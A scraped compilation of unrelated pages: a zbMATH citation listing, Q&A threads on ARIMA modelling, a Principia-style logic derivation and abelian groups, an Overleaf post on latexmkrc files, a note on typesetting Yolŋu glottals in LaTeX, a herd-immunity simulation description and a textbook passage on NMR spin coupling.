Bianchi, Gabriele; Böröczky, Károly J.; Colesanti, Andrea
2020
Berezin-Toeplitz quantization for eigenstates of the Bochner Laplacian on symplectic manifolds. Zbl 1442.53061
Ioos, Louis; Lu, Wen; Ma, Xiaonan; Marinescu, George
2020
The Hermite-Hadamard inequality in higher dimensions. Zbl 1436.26025
Steinerberger, Stefan
2020
Some remarks on the pointwise sparse domination. Zbl 1434.42020
Lerner, Andrei K.; Ombrosi, Sheldy
2020
Explicit absolute parallelism for 2-nondegenerate real hypersurfaces $$M^5 \subset \mathbb{C}^3$$ of constant Levi rank 1. Zbl 1452.32044
Merker, Joël; Pocchiola, Samuel
2020
Mean curvature flow solitons in the presence of conformal vector fields. Zbl 1436.53066
Alías, Luis J.; de Lira, Jorge H.; Rigoli, Marco
2020
Morse-Novikov cohomology on complex manifolds. Zbl 1436.32032
Meng, Lingxu
2020
Gradient-type systems on unbounded domains of the Heisenberg group. Zbl 1442.35491
Molica Bisci, Giovanni; Repovš, Dušan
2020
Perelman’s functionals on cones. Construction of type III Ricci flows coming out of cones. Zbl 1435.53069
Ozuch, Tristan
2020
Contracting convex hypersurfaces in space form by non-homogeneous curvature function. Zbl 1444.53057
Li, Guanghan; Lv, Yusha
2020
Sharp weighted estimates for square functions associated to operators on spaces of homogeneous type. Zbl 1434.42012
Bui, The Anh; Duong, Xuan Thinh
2020
Self-contracted curves in CAT(0)-spaces and their rectifiability. Zbl 1434.52012
Ohta, Shin-Ichi
2020
On defining functions and cores for unbounded domains. II. Zbl 1462.32038
Harz, Tobias; Shcherbina, Nikolay; Tomassini, Giuseppe
2020
Existence results for minimizers of parametric elliptic functionals. Zbl 1436.49055
De Philippis, Guido; De Rosa, Antonio; Ghiraldin, Francesco
2020
One-dimensional symmetry for the solutions of a three-dimensional water wave problem. Zbl 1437.35173
Cinti, Eleonora; Miraglio, Pietro; Valdinoci, Enrico
2020
Existence problems on Heisenberg groups involving Hardy and critical terms. Zbl 07187376
Bordoni, Sara; Filippucci, Roberta; Pucci, Patrizia
2020
A Hardy-Littlewood maximal operator for the generalized Fourier transform on $$\mathbb{R}$$. Zbl 1436.42027
Ben Saïd, Salem; Deleaval, Luc
2020
A characterization of harmonic $$L^r$$-vector fields in two-dimensional exterior domains. Zbl 1464.35102
Hieber, Matthias; Kozono, Hideo; Seyfert, Anton; Shimizu, Senjo; Yanagisawa, Taku
2020
Cao, Huai-Dong; Cui, Xin
2020
On Lipschitz rigidity of complex analytic sets. Zbl 1448.14002
Fernandes, Alexandre; Sampaio, J. Edson
2020
Asymptotic convergence for a class of fully nonlinear curvature flows. Zbl 1434.53096
Li, Qi-Rui; Sheng, Weimin; Wang, Xu-Jia
2020
Maxima of curvature functionals and the prescribed Ricci curvature problem on homogeneous spaces. Zbl 1436.53033
Pulemotov, Artem
2020
Geometric characterization of Lyapunov exponents for Riemann surface laminations. Zbl 1450.37031
Nguyên, Viêt-Anh
2020
Regularity of solutions to the quaternionic Monge-Ampère equation. Zbl 1446.32023
Kołodziej, Sławomir; Sroka, Marcin
2020
Bloom type upper bounds in the product BMO setting. Zbl 1440.42063
Li, Kangwei; Martikainen, Henri; Vuorinen, Emil
2020
The Gauss-Bonnet theorem for coherent tangent bundles over surfaces with boundary and its applications. Zbl 1457.57040
Domitrz, Wojciech; Zwierzyński, Michał
2020
Local Hardy spaces with variable exponents associated with non-negative self-adjoint operators satisfying Gaussian estimates. Zbl 1442.42052
Almeida, Víctor; Betancor, Jorge J.; Dalmasso, Estefanía; Rodríguez-Mesa, Lourdes
2020
On the spectrum of differential operators under Riemannian coverings. Zbl 1447.58010
Polymerakis, Panagiotis
2020
On the squeezing function and Fridman invariants. Zbl 1436.32048
Nikolov, Nikolai; Verma, Kaushal
2020
Generalizations of the higher dimensional Suita conjecture and its relation with a problem of Wiegerinck. Zbl 07187353
Błocki, Zbigniew; Zwonek, Włodzimierz
2020
Sobolev mapping of some holomorphic projections. Zbl 1446.32005
Edholm, L. D.; McNeal, J. D.
2020
Pluricomplex Green functions on manifolds. Zbl 1436.32108
Poletsky, Evgeny A.
2020
On attractors of generalized semiflows with impulses. Zbl 1440.37036
de Mello Bonotto, Everaldo; Kalita, Piotr
2020
A weak reverse Hölder inequality for caloric measure. Zbl 1436.42028
Genschaw, Alyssa; Hofmann, Steve
2020
Quasiregular families bounded in $$L^p$$ and elliptic estimates. Zbl 1436.30014
Hinkkanen, Aimo; Martin, Gaven
2020
Infinite-time singularity type of the Kähler-Ricci flow. Zbl 1436.53076
Zhang, Yashan
2020
Prescribing capacitary curvature measures on planar convex domains. Zbl 1445.52001
Xiao, Jie
2020
The Orlicz Brunn-Minkowski inequality for the projection body. Zbl 1436.52008
Zou, Du; Xiong, Ge
2020
Non-local Gehring lemmas in spaces of homogeneous type and applications. Zbl 1462.30121
Auscher, Pascal; Bortz, Simon; Egert, Moritz; Saari, Olli
2020
Hermitian curvature flow on compact homogeneous spaces. Zbl 07327626
Panelli, Francesco; Podestà, Fabio
2020
The second inner variation of energy and the Morse index of limit interfaces. Zbl 1443.53022
Gaspar, Pedro
2020
The Kobayashi pseudometric for the Fock-Bargmann-Hartogs domain and its application. Zbl 1439.32027
Bi, Enchao; Su, Guicong; Tu, Zhenhan
2020
Tangent Lie algebra of a diffeomorphism group and application to holonomy theory. Zbl 1433.22010
Hubicska, Balázs; Muzsnay, Zoltán
2020
Einstein four-manifolds with sectional curvature bounded from above. Zbl 1443.53026
Zhang, Zhuhong
2020
$$H^p$$ boundedness of multilinear spectral multipliers on stratified groups. Zbl 1431.43007
Fang, Jingxuan; Zhao, Jiman
2020
...and 1281 more Documents
all top 5
#### Cited by 7,121 Authors
87 Yang, Dachun 48 Colombo, Fabrizio 43 Sabadini, Irene 42 Lu, Guozhen 33 Rodríguez García, José Manuel 31 Forstnerič, Franc 29 Isaev, Alexander 26 Duong, Xuan Thinh 23 Bownik, Marcin 23 Chang, Der-Chen E. 23 Gilkey, Peter B. 23 Li, Ji 23 Yuan, Wen 22 Hofmann, Steve 22 Sun, Wenchang 21 García-Río, Eduardo 21 Krantz, Steven George 21 Wold, Erlend Fornæss 20 Angella, Daniele 20 Fornæss, John Erik 20 Markina, Irina 20 Uhlmann, Gunther Alberto 19 Yang, Sibei 18 Kutzschebauch, Frank 18 Magnani, Valentino 18 Mengestie, Tesfa Y. 18 Pinamonti, Andrea 18 Valdinoci, Enrico 17 Auscher, Pascal 17 Cianchi, Andrea 17 Fefferman, Charles Louis 17 Guedj, Vincent 17 Jiang, Renjin 17 Li, Kangwei 17 Martell, José María (Chema) 17 Mayboroda, Svitlana 17 Novaga, Matteo 17 Pesenson, Isaac Zalmanovich 17 Raich, Andrew S. 17 Yuditskii, Peter Meerovich 16 Alpay, Daniel Aron 16 Berman, Robert J. 16 Bory Reyes, Juan 16 Boyer, Charles P. 16 D’Angelo, John P. 16 Garofalo, Nicola 16 Jost, Jürgen 16 Liu, Taishun 16 Morgan, Frank 16 Shimomura, Tetsu 16 Sibony, Nessim 16 Song, Liang 16 Struppa, Daniele Carlo 16 The Anh Bui 16 Tu, Zhenhan 16 Wang, Wei 16 Wu, Jiayong 16 Yan, Lixin 16 Zaitsev, Dmitri 15 De Lellis, Camillo 15 Hamada, Hidetaka 15 Han, Yongsheng 15 Huang, Guangyue 15 Lebl, Jiří 15 Malchiodi, Andrea 15 Mourgoglou, Mihalis 15 Pratelli, Aldo 15 Sire, Yannick 15 Tien Cuong Dinh 15 Tomassini, Adriano 15 Zwonek, Włodzimierz 14 Bartolucci, Daniele 14 Cruz-Uribe, David Vincente 14 Gaussier, Hervé 14 Hainzl, Christian 14 Huang, Xiaojun 14 Koskela, Pekka 14 Lamel, Bernhard 14 Le Donne, Enrico 14 Mitrea, Marius 14 Moen, Kabe 14 Rosales, César 14 Simon, Barry 14 Streets, Jeffrey D. 14 Székelyhidi, László jun. 14 Tyson, Jeremy T. 14 Vallarino, Maria 14 Wei, Juncheng 13 Abreu-Blaya, Ricardo 13 Alarcón, Antonio 13 Balogh, Zoltán M. 13 Bernicot, Frédéric 13 Cheltsov, Ivan Anatol’evich 13 Di Nezza, Eleonora 13 Franchi, Bruno 13 Giga, Yoshikazu 13 Kohr, Gabriela 13 Labate, Demetrio 13 Mondino, Andrea 13 Nikolov, Nikolai Marinov ...and 7,021 more Authors
all top 5
#### Cited in 515 Journals
710 The Journal of Geometric Analysis 330 Journal of Mathematical Analysis and Applications 290 Proceedings of the American Mathematical Society 257 Calculus of Variations and Partial Differential Equations 256 Transactions of the American Mathematical Society 248 Journal of Functional Analysis 244 Advances in Mathematics 194 Mathematische Zeitschrift 188 Mathematische Annalen 153 Nonlinear Analysis. Theory, Methods & Applications. Series A: Theory and Methods 129 Annals of Global Analysis and Geometry 115 Journal of Geometry and Physics 115 The Journal of Fourier Analysis and Applications 107 Differential Geometry and its Applications 105 International Journal of Mathematics 103 Journal of Differential Equations 100 Annali di Matematica Pura ed Applicata. Serie Quarta 95 Duke Mathematical Journal 89 Geometriae Dedicata 85 Journal de Mathématiques Pures et Appliquées. Neuvième Série 82 Potential Analysis 81 Revista Matemática Iberoamericana 79 Annales de l’Institut Fourier 76 Archive for Rational Mechanics and Analysis 75 Communications in Mathematical Physics 72 Applied and Computational Harmonic Analysis 68 Journal d’Analyse Mathématique 68 Inventiones Mathematicae 68 Communications in Partial Differential Equations 68 Science China. Mathematics 66 Acta Mathematica Sinica. English Series 65 Comptes Rendus. Mathématique. Académie des Sciences, Paris 63 Complex Variables and Elliptic Equations 58 Manuscripta Mathematica 54 Results in Mathematics 53 Journal of Mathematical Physics 51 Archiv der Mathematik 49 Geometric and Functional Analysis. GAFA 49 Complex Analysis and Operator Theory 47 Journal für die Reine und Angewandte Mathematik 46 Mathematische Nachrichten 45 Annales de la Faculté des Sciences de Toulouse. Mathématiques. Série VI 42 Annales de l’Institut Henri Poincaré. Analyse Non Linéaire 42 Geometry & Topology 41 SIAM Journal on Mathematical Analysis 40 Communications in Contemporary Mathematics 39 Journal of the European Mathematical Society (JEMS) 39 Mediterranean Journal of Mathematics 38 Integral Equations and Operator Theory 38 Bulletin des Sciences Mathématiques 37 European Series in Applied and Industrial Mathematics (ESAIM): Control, Optimization and Calculus of Variations 35 Israel Journal of Mathematics 35 Communications on Pure and Applied Analysis 34 Michigan Mathematical Journal 34 Monatshefte für Mathematik 32 Memoirs of the American Mathematical Society 30 Communications on Pure and Applied Mathematics 30 Pacific Journal of Mathematics 30 Chinese Annals of Mathematics. Series B 30 International Journal of Wavelets, Multiresolution and Information Processing 30 Analysis and Mathematical Physics 30 Analysis and Geometry in Metric Spaces 29 Tohoku Mathematical Journal. Second Series 29 Discrete and Continuous Dynamical Systems 29 Journal of Function Spaces 28 Journal of the American Mathematical Society 28 Forum Mathematicum 26 Illinois Journal of Mathematics 26 Annales Academiae Scientiarum Fennicae. Mathematica 26 Annals of Mathematics. Second Series 25 Applicable Analysis 25 Journal of Approximation Theory 25 Bulletin of the American Mathematical Society. New Series 25 Journal of Inequalities and Applications 24 Siberian Mathematical Journal 24 Journal of Mathematical Sciences (New York) 24 Journal of the Australian Mathematical Society 24 Advanced Nonlinear Studies 23 Arkiv för Matematik 23 Proceedings of the Steklov Institute of Mathematics 22 Computational Methods and Function Theory 22 Frontiers of Mathematics in China 21 Bulletin of the Australian Mathematical Society 21 Rocky Mountain Journal of Mathematics 21 Revista Matemática Complutense 21 Annales Henri Poincaré 20 Inverse Problems 20 Ergodic Theory and Dynamical Systems 20 Abstract and Applied Analysis 20 Advances in Calculus of Variations 19 Journal of Geometry 19 Transformation Groups 19 Conformal Geometry and Dynamics 19 Journal of Pseudo-Differential Operators and Applications 19 Complex Analysis and its Synergies 18 Journal of the Mathematical Society of Japan 18 NoDEA. Nonlinear Differential Equations and Applications 18 Annali della Scuola Normale Superiore di Pisa. Classe di Scienze. Serie V 18 Banach Journal of Mathematical Analysis 18 Analysis & PDE ...and 415 more Journals
all top 5
#### Cited in 61 Fields
2,770 Differential geometry (53-XX) 2,162 Partial differential equations (35-XX) 1,760 Several complex variables and analytic spaces (32-XX) 1,302 Harmonic analysis on Euclidean spaces (42-XX) 1,230 Global analysis, analysis on manifolds (58-XX) 783 Functional analysis (46-XX) 779 Functions of a complex variable (30-XX) 655 Operator theory (47-XX) 624 Calculus of variations and optimal control; optimization (49-XX) 381 Dynamical systems and ergodic theory (37-XX) 310 Algebraic geometry (14-XX) 296 Topological groups, Lie groups (22-XX) 286 Real functions (26-XX) 286 Abstract harmonic analysis (43-XX) 270 Potential theory (31-XX) 252 Measure and integration (28-XX) 250 Manifolds and cell complexes (57-XX) 240 Probability theory and stochastic processes (60-XX) 205 Convex and discrete geometry (52-XX) 171 Quantum theory (81-XX) 163 Fluid mechanics (76-XX) 153 Numerical analysis (65-XX) 135 Integral transforms, operational calculus (44-XX) 113 Ordinary differential equations (34-XX) 107 Number theory (11-XX) 95 Mechanics of deformable solids (74-XX) 92 Group theory and generalizations (20-XX) 84 Statistical mechanics, structure of matter (82-XX) 80 Information and communication theory, circuits (94-XX) 72 Combinatorics (05-XX) 68 Approximations and expansions (41-XX) 68 Geometry (51-XX) 68 Relativity and gravitational theory (83-XX) 61 General topology (54-XX) 55 Nonassociative rings and algebras (17-XX) 52 Special functions (33-XX) 47 Linear and multilinear algebra; matrix theory (15-XX) 46 Algebraic topology (55-XX) 42 Optics, electromagnetic theory (78-XX) 40 Difference and functional equations (39-XX) 39 Mechanics of particles and systems (70-XX) 34 Systems theory; control (93-XX) 33 Biology and other natural sciences (92-XX) 30 Integral equations (45-XX) 29 Commutative algebra (13-XX) 28 Statistics (62-XX) 27 Operations research, mathematical programming (90-XX) 24 Computer science (68-XX) 21 Classical thermodynamics, heat transfer (80-XX) 15 History and biography (01-XX) 12 General and overarching topics; collections (00-XX) 12 Field theory and polynomials (12-XX) 9 Associative rings and algebras (16-XX) 9 $$K$$-theory (19-XX) 8 Geophysics (86-XX) 7 Game theory, economics, finance, and other social and behavioral sciences (91-XX) 6 Mathematical logic and foundations (03-XX) 6 Category theory; homological algebra (18-XX) 6 Sequences, series, summability (40-XX) 6 Astronomy and astrophysics (85-XX) 1 General algebraic systems (08-XX)
|
|
# Fitting an ARIMA to CPI: How "valid" is this model I've fitted?
I'm trying to fit an ARIMA model to monthly CPI. SO far, I've established stationarity using a DF test of the differenced CPI.
I have then proceeded to find the ACF and PACF of the differenced variable, which are as follows:
These are very peculiar to me (i.e. 3 irregular and significant lags after the first for both ACF and PACF). What can I make of this? Is this due to seasonality?
Regardless, I proceeded to fit the best ARIMA model using the auto.arima feature in R which picks an ARIMA model with the lowest information criterion. What I got was an ARIMA(2,1,2) as follows:
All coefficients are signficant, and the BIC would be lowest here, so I don't see any problems. Please correct me if I'm wrong in saying that there is nothing wrong here
I then proceeded to do some residual diagnostics, namely, doing a Box-Ljung test of the residuals with the following lags/dfs (not totally sure what this does) but anyways here are the results (and also the code I used):
So for df=1,4 and 5 (arbitrarily chosen, is there a better way to do this?) I get p > 0.05 which is what I am looking for. But for df= 36, 12 and 13 I get p <0.05 which is indicating that there are correlations among residuals indicating that the ARIMA(2,1,2) is not a good model.
Finally, I've included an ACF of the residuals:
Again, this is not what I'd like to see as we see a few significant correlations here.
So, should I accept this model regardless of the fact that there were a few indications that it wasn't ideal (ACF, PACF, Box-Ljung test, and ACF of residuals)? What would you do next? Does the ACF or PACF indicate seasonality perhaps?
Any help or guidance is appreciated! I'm still new to ARIMA modelling.
• A 12-month seasonality in the monthly changes in CPI could some mixture of (a) regular seasonal price rises and falls, e.g. before and after the holiday season or (b) regular excise duty and indirect tax changes associated with an annual government budget Jun 9 at 17:12
You have some seasonality going on at period/frequency 12, and I don't know if auto.arima is taking that into account. You haven't posted your code.
Instead of using black box functions and not being totally certain about how they work, I would suggest writing down a few low-order SARIMA models, deriving their ACF and PACFs, and then try picking a model based on how its theoretical ACF/PACF fits your empirical ACF/PACF. If you need to check your work, R has a function ARMAacf that can help you.
• +1. auto.arima() in this case does not take the seasonality into account - ARIMA(2,1,2) is non-seasonal. I strongly suspect d.Y does not have a seasonality attribute, which needs to be encoded explicitly via ts(..., frequency=12). Plus, I personally do not recommend differencing the time series outside auto.arima(), which should be able to decide on the order of differencing by itself. It probably does a better job at model selection via information criteria than someone untrained (sorry) by looking at (P)ACF in the box-jenkins way. Mar 21 '18 at 4:17
|
|
# Derivation of $p \supset (\thicksim p \supset q)$ in Gödel's Proof by Nagel/Newman
## The actual question
I am currently reading Gödel's Proof by Nagel and Newman. Chapter V deals with the formalization and consistency of a simple system of formal logic.
On page 50, after giving the rules of the system (see below), the authors state, without giving a proof, that
$p \supset (\thicksim p \supset q)$ is a theorem in the calculus
It seems like this should be relatively easy to prove, but I can't see how. I feel I may be missing something important because there are I see no rules or axioms concerning negation (or conjunction for that matter), which there probably should be.
Can anyone give the complete proof ?
## Rules of the formal calculus defined in the book
I call formula any syntaxically valid string, and theorem any formula that can be derived from the axioms. The book does not always clearly make this distinction, so the rules I give here are somewhat rephrased.
The rules of the system are essentially defined as follows:
• Letters, and $\thicksim$, $\vee$, $\cdot$, $\supset$, $($, $)$ are the only allowed symbols in formulas;
• If $S$ and $S'$ are formulas, then $\thicksim (S)$, $(S) \vee (S')$, $(S) \cdot (S')$, and $(S) \supset (S')$ are formulas;
• Rule of substitution: in a theorem, one can uniformly replace a variable with a formula and obtain another theorem;
• Rule of detachement: if $S$ and $S\supset S'$ are theorems, $S'$ is a theorem;
• Axioms: the following formulas are theorems:
1. $(p\vee p)\supset p$,
2. $p\supset (p\vee q)$,
3. $(p\vee q)\supset (q\vee p)$, and
4. $(p\supset q)\supset ((p\vee r)\supset(q\vee r))$.
• See Alfred North Whitehead & Bertrand Russell, Principia Mathematica to *56 (2nd ed - 1927); page 12 for the def : $p \supset q \overset{def}{=} \lnot p \lor q$, and page 104 for the proof of *2.21 : $\lnot p \supset (p \supset q)$, by subst of $\lnot p$ in place of $p$ into Ax.2 [$p \supset (p \lor q)$] followed by *2.24 : $p \supset (\lnot p \supset q)$. – Mauro ALLEGRANZA Nov 5 '15 at 7:27
Their system seems to be missing a crucial link between '$\supset$', '$\vee$' and '$\sim$'. If they gave an additional axiom $(\sim\!p \vee q) \supset (p \supset q)$, or defined $\supset$ as $(\sim\!p \vee q)$, then the formula would be derivable. See this thread discussing the omission. (The first quoted assertion there is false, though: of course $p \supset p$ can be derived: it follows from axioms 2. (substituting $p$ for $q$) and 1., then using detachment.)
Nagel and Newman almost surely discuss the propositional calculus of Principia Mathematica (without one of the axioms of the book which years after the book got written got found to come as derivable from the other axioms). In the system of Principia Mathematica and using the notational scheme you did, ⊃ doesn't actually exist as a primitive concept, but rather (p) ⊃ (q) abbreviates ~(p) ∨ (q).
I will switch to Polish notation in the following. I will also use $\vdash$ instead of saying something like "is a theorem".
The rules of the system remain the same, except
1. Only lower case letters, N, A, K, and C come as allowed in formulas.
2. If $\alpha$ and $\beta$ qualify as formulas, so do N$\alpha$, A$\alpha$$\beta, K\alpha$$\beta$, C$\alpha$$\beta. 3. The rule of detachment correspondingly becomes if \vdash$$\alpha$, $\vdash$AN$\alpha$$\beta, then \vdash$$\beta$.
The axioms also now correspondingly become:
1. ANAppp.
2. ANpApq.
3. ANApqAqp.
4. ANANpqANAprAqr.
Here's a parenthesized Polish notation proof generated by Prover9 with 'P' standing for $\vdash$:
% -------- Comments from original proof --------
% Proof 1 at 0.00 (+ 0.01) seconds.
% Length of proof is 13.
% Level of proof is 5.
% Maximum clause weight is 15.
% Given clauses 10.
1 P(A(N(x),A(N(N(x)),y))) # label(non_clause) # label(goal). [goal].
2 -P(A(N(x),y)) | -P(x) | P(y). [assumption].
3 P(A(N(A(x,x)),x)). [assumption].
4 P(A(N(x),A(x,y))). [assumption].
5 P(A(N(A(x,y)),A(y,x))). [assumption].
6 P(A(N(A(N(x),y)),A(N(A(x,z)),A(y,z)))). [assumption].
7 -P(A(N(c3),A(N(N(c3)),c4))). [deny(1)].
8 P(A(N(A(x,y)),A(A(x,z),y))). [hyper(2,a,6,a,b,4,a)].
9 P(A(N(A(A(x,x),y)),A(x,y))). [hyper(2,a,6,a,b,3,a)].
10 P(A(A(N(x),y),A(x,z))). [hyper(2,a,8,a,b,4,a)].
11 P(A(A(x,y),A(N(x),z))). [hyper(2,a,5,a,b,10,a)].
12 P(A(x,A(N(x),y))). [hyper(2,a,9,a,b,11,a)].
13 \$F. [resolve(12,a,7,a)].
============================== end of proof ==========================
|
|
Showing first {{hits.length}} results of {{hits_total}} for {{searchQueryText}}{{hits.length}} results for {{searchQueryText}}
Ничего не найдено
Hands up if you've heard of a latexmkrc file? Now keep your hands up if you know what it does. Now keep your hands up if you've ever written your own. Anyone with their hands still up—you probably don't need to read the rest of this post. Why the interest in latexmkrc? We've recently had a number of users get in touch to ask how to do certain things with Overleaf, to which our answer has begun: "Firstly, create a custom latexmkrc file in your project...". Given that this isn't the most intuitive part of LaTeX, and documentation on the web (and examples in particular) are quite sparse, we thought we'd explore it here in a bit more detail. @FancyWriter yes - you can set command options by creating a custom latexmkrc file in a project, with $pdflatex = 'pdflatex --shell-escape';— Overleaf (@overleaf) June 15, 2014 What is a latexmkrc file? If you've never seen it before, a latexmkrc file is a configuration / initialization (RC) file for the Latexmk package. Latexmk is used by Overleaf to control the compilation of your source LaTeX document into the final typeset PDF file. By using a customized configuration file called Latexmk you can override the default compilation commands to allow Overleaf to compile your document in a special way. Why would I want to use a latexmkrc file? Well, as an example, did you know that all the dates and times in the PDF compiled on Overleaf are the dates and times of the server’s by default. What if instead you'd like to use your local date/time? To display the date/time local to your timezone, you can change the TZ (timezone) environment variable using a custom latexmkrc file: In your project editor window, click on “Add file” on the top of the project sidebar. Select “Blank file”, and name the file latexmkrc. Add the following line to the file latexmkrc:$ENV{'TZ'}='Canada/Central'; or whichever timezone required. Here's a list of supported time zones for reference. Dates and times (e.g. \today and \currenttime from the datetime package) in the PDF should then give values local to the specified time zone. Where can I find more examples of latexmkrc commands? As a start, check out the following examples from our help pages: Can I run plain TeX on Overleaf? Does Overleaf support pTeX? I have a lot of .cls, .sty, .bst files, and I want to put them in a folder to keep my project uncluttered. But my project is not finding them to compile correctly. How can I make the xr package work on Overleaf? How do I make \today display the date according to my time zone? (that example is re-used above) If those don't help, please feel free to contact us page or try the popular TeXStackExchange and LaTeXCommunity forums.
|
|
# Abelian Groups
Can you check next statements, and they are proofs?
Statement 1. Lets $A, A_1, A_2$ - are abelian groups and $$A = A_1\oplus A_2.$$ Then $$A/A_1=A_2.$$ Proof: $$A=\{(a_1, a_2)|a_1\in A_1,~~a_2\in A_2\}.$$ $$x = (x_1, x_2)\sim y = (y_1, y_2)\Leftrightarrow x-y\in A_1 \Leftrightarrow x_2=y_2.$$ So, homomorphism $\varphi : A/A_1\to A_2$, such that $$\varphi(a_1, a_2) = a_2,$$ is isomorphism. $\blacksquare$
Statement 2. Lets $A\supset B$ - abelian, then $$A = B\oplus A/B$$
Proof: $A\supset B$, therefore $$\exists C\subset A: A=B\oplus C.$$ And from first statement: $$C = A/B.$$ $\blacksquare$
Thanks.
-
It's a bad sign in a proof when you have a statement with no attempt to justify it. Why does $A \supset B$ imply the existence of a $C$ such that $A=B \oplus C$? – Chris Eagle Nov 23 '11 at 18:19
It should be true, at least for finitely generated abelian groups, that any quotient will appear as a subgroup. But Prof Magidin's example shows that you can't expect this to give a direct sum decomposition. – Dylan Moreland Nov 23 '11 at 18:57
(2⊕4)/(1⊕2) ≅ 2⊕2 ≠ 4, so you have to make sure to use the right copy of A1 in A. – Jack Schmidt Nov 23 '11 at 20:43
First statement: you don't have equality between $A/A_1$ and $A_2$, you have isomorphism.
The second statement: you cannot hope for equality in general, though you may hope for isomorphism. However, Statement 2 is false: take $A$ to be cyclic of order $4$, $B$ to be the unique cyclic subgroup of order $2$. Then $A/B$ is cyclic of order $2$, so your assertion is that the cyclic group of order $4$ (namely, $A$) is isomorphic to a direct sum of a cyclic group of order $2$ (namely $B$) and another cyclic group of order $2$ (namely, $A/B$). This is false.
The error lies in the assertion that there must exist a $C$ contained in $A$ such that $A=B\oplus C$. There is no warrant for this assertion, as you can see with the example above.
|
|
# Yan-nhaŋu glottals and LaTeX
This post will probably be of interest only to the (rather small number of) people who use LaTeX to typeset Yolŋu Matha. Yolŋu Matha uses a symbol for the glottal stop which is basically an apostrophe ‘ without smart quotes turned on (it dates from the days before smart quotes). These days there is a small movement amongst Yolŋu typesetters to distinguish quotation marks from the glottal. This turns out to be surprisingly hard to do in LaTeX. Prime symbols won’t work, the verbatim environment doesn’t work, the IPA primary stress mark doesn’t work. What does look ok, however, is the tipa vertical bar accent with some space fudging.
{\textipa{\hspace{-1.5pt}\textvbaraccent{}\hspace{-1.5pt}}}
to be precise.
### 4 responses to “Yan-nhaŋu glottals and LaTeX”
1. I assume that the reason \verb doesn’t work is that it switches to the monospaced font?
If you use XeLaTeX, then you can use the fontspec package, and refrain from using the Mapping=tex-text option; this will cause straight vertical apostrophes not to turn into curved apostrophes/right single quotes. On the other hand, doing this means that you’d have to use “smart” quotes in your source file whenever you want them to appear, so if you’re used to using and ‘, it could be a bit of a pain.
Alternatively, if you use the Linux Libertine font, you can use the command \\useTextGlyph{fxl}{quotesingle} to specify the vertical apostrophe.
2. Oops; there’s an extra backslash in there.
3. “so if you’re used to using and ‘, it could be a bit of a pain”
Unless of course you’re using a Mac with one of the English keyboards, in which case “” are available as Opt+[ and Opt+Shift+[, and ‘’ are available as Opt+] and Opt+Shift+].
I highly recommend people avoid using the Mapping=tex-text option because it defeats one of the major purposes of XeTeX which is to use Unicode consistently and properly for encoding text. The tex-text mapping is really only meant as a backwards compatibility option for older documents. Once you have a reliable method of inputting “” and ‘’, it’s easy enough to search and replace all instances of ` and ‘ in your document.
Also, in my humble opinion, writing systems which use quotes as orthographic symbols (rather than punctuation) should avoid using them as quotation marks. Instead there’s the much less ambiguous «» and ‹› for quoting.
4. XeLaTeX and the learner’s guide document don’t coexist very happily for some reason. I need to spend a bit of time with TeXShop and the compilation engines. There’s something about epsfig that’s working strangely (or rather not working). There’s also a backwards compatibility issue in that I use miktex and winedt on my pc (I find texshell pretty hard to use) and winedt isn’t unicode compliant.
The problem is using the straight quote for the glottal. If they used the single curly quote there’d be no problem; we could use that for glottals and double quotation marks for speech.
|
|
Add an Element to a List - Maple Programming Help
Add an Element to a List
Description Add an element to a list.
Enter a list.
> $\left[{1}{,}{-2}{,}{6}{,}{3}\right]$
$\left[{1}{,}{-}{2}{,}{6}{,}{3}\right]$ (1)
Specify a new element, and then add the new element to the list.
> $\left[\mathrm{op}\left(\right),{3}\right]$
$\left[{1}{,}{-}{2}{,}{6}{,}{3}{,}{3}\right]$ (2)
>
Commands Used
|
|
EXPLORABLES
This explorable illustrates the mechanism of herd immunity. When an infectious disease spreads in a population, an individual can be protected by a vaccine that delivers immunity. But there's a greater good. Immunization not only projects the individual directly. The immunized person will also never transmit the disease to others, effectively reducing the likelihood that the disease can proliferate in the population. Because of this, a disease can be eradicated even if not the entire population is immunized. This population wide effect is known as herd immunity.
Press Play and keep on reading....
## This is how it works
This explorable is actually a set of four similar explorables, all of which model the spread of a disease in a population with $$N$$ individuals. An individual can be Susceptible, which means the person can acquire the disease and become Infected. Once infected, the person can transmit the disease to other susceptibles. An infected individual remains infectious for some time, recover subsequently, and become susceptible again.
This model is known as the SIS-model, one of the simplest dynamical models for infectious disease dynamics. If, on average, an infected person transmits to more than one other person during the infectious period, the disease will reach an endemic state in the population in which new infections and recoveries balance. You may also want to check the explorables Critical HEXersize and Epidemonic for more information on epidemic models.
Vaccination is modelled this way: All individuals can spontaneously decide to vaccinate at a certain rate such that in equilibrium a fraction $$P$$ of the population is vaccinated.
Both, vaccine uptake and transmissibility of the disease can be controlled with a slider.
The system is initially fully susceptible with a few infected individuals randomly scattered into the population.
### Model 1: The mixed population
In this version of the SIS-model, individuals move around randomly and interact with only with other individuals in their proximity. Transmissions occur by face-to-face contacts.
When you press play, the number of infected people will increase until a dynamic equilibrium is reached. Now turn the vaccine uptake up until you find the point at which the disease will be eradicated. The higher the transmissibility, the higher the critical threshold for the vaccine uptake.
### Model 2: The static network model
In this model, individuals are stationary and linked forming a heterogeneous network in which some individuals possess more links than others. The disease is only transmitted across links in the network. Some nodes have more connections than others and are more likely to become infected and spread the disease.
As you increase the vaccine uptake, you should see that near the critical point pockets of infections exist, whereas other areas in the network remain disease free.
### Model 3: The dynamic network model
In this model, the population is also connected by links network. Transmissions only occur between linked individuals. However, these links change over time. Individuals may rearrange their connections, cut old ones and establish new ones.
This particular "rewiring" generates little groups that are densely connected and individuals move between them.
### Model 4: The spatial lattice model
This model is a bit more abstract and has been used to investigate spatial aspects of disease dynamics. Here we have a $$40\times 40$$ square lattice. Every lattice site can be in one of the three states S, I and V. Transmissions only occur between neighboring lattice sites.
|
|
# Nmr (Page 5/6)
Page 5 / 6
The differences in chemical shift labeled J are known as the coupling constant. If two nuclei are coupled to each other, the coupling constants will be the same. For example, in the case of 1,1-dibromo-2,2-dichloroethane, the two peaks that make up the doublet due to the ${\text{CCl}}_{2}$ will be exactly split the same distance as the two peaks that make up the doublet due to the ${\text{CBr}}_{2}$ group. In a complex spectrum, this allows us to identify which peaks are coupled to each other. Peaks that are coupled to each other will most likely arise because the H atoms are on adjacent (or nearby) carbon atoms.
We need to consider a couple of other cases in order to have enough information on coupling patterns to understand common problems. There are cases where there is more than one proton on adjacent carbon atoms.
Let us first consider the case where one or more protons on one carbon atom (let's call it Carbon A) "see" two identical protons on a neighboring carbon atom (called Carbon B). What types of magnetic fields will be seen by the protons on Carbon A? To sort this out, we need to consider the different possible spin combinations of the protons on Carbon B. This is done purely by probability. There are four possibilities:
